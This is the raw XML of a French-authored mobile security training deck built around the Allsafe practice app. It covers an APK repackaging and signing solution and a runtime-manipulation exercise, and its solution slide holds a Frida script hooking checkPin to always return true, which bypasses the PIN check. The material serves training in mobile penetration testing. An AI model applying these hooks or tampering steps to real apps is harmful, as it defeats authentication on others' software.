            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keyalg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> RSA -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>keysize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 2048</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>~/Android/Sdk/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>build-tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/30.0.2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apksigner</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sign</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ks</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keystore.jks</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ks-pass</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pass:mobile</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allsafe-new.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D0B0D"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>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a:t>Exercice 9 : Reverse Engineering (Smali Patch) [Solution]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-F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3045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96875-7E18-4C9D-96CC-1D6AA06B3CA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Unistall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>existing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> app and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the new one, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> click on « CHECK FIREWALL STATUS » :</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62E07738-4885-4A28-A95C-F3853DC17126}"/>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en-US"/>
              <a:t>Exercice 9 : Reverse Engineering (Smali Patch) [Solution]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AEFB90F-A857-49BF-89DF-720A5E9655A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect r="15165" b="20020"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3194297" y="2511972"/>
            <a:ext cx="2443198" cy="3988124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"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8699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Case </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>Study</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t> 1 : Netflix</a:t>
            </a:r>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10 : Runtime Manipulation</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880" t="2607" b="3258"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2867768" y="2183942"/>
            <a:ext cx="3408464" cy="3789822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22847548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gn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Mission Briefing : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t>Try to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>modify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> the runtime </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>behaviour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> app in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0" err="1"/>
              <a:t>order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" dirty="0"/>
              <a:t> to bypass the PIN code validation check.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1800" b="1" dirty="0"/>
              <a:t>Ressources :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Testing Confirm Credentials (MSTG-AUTH-1 and MSTG-STORAGE-11)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>/OWASP/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>owasp-mstg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" i="1" dirty="0"/>
              <a:t>/blob/master/Document/0x05f-Testing-Local-Authentication.md</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10 : Runtime Manipulation</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3805734" y="5413338"/>
            <a:ext cx="1438984" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Tools :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Frida</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505267" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>NA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0EE3FDF-3E51-4005-94B9-5BD8E84DCBB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="49870" t="4590" r="2665" b="64936"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="938694" y="5842411"/>
            <a:ext cx="1096963" cy="528915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26595496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96875-7E18-4C9D-96CC-1D6AA06B3CA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="418730" y="1447801"/>
            <a:ext cx="8503057" cy="5029199"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>override</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>checkPin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" u="sng" dirty="0" err="1"/>
              <a:t>method</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" u="sng" dirty="0"/>
              <a:t> to return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" u="sng" dirty="0" err="1"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" u="sng" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" u="sng" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Java.perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> () {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Starting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>allsafe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root_class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Java.use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>infosecadventures.allsafe.challenges.PinBypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>root_class.checkPin.implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>console.log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>checkPin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>!");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
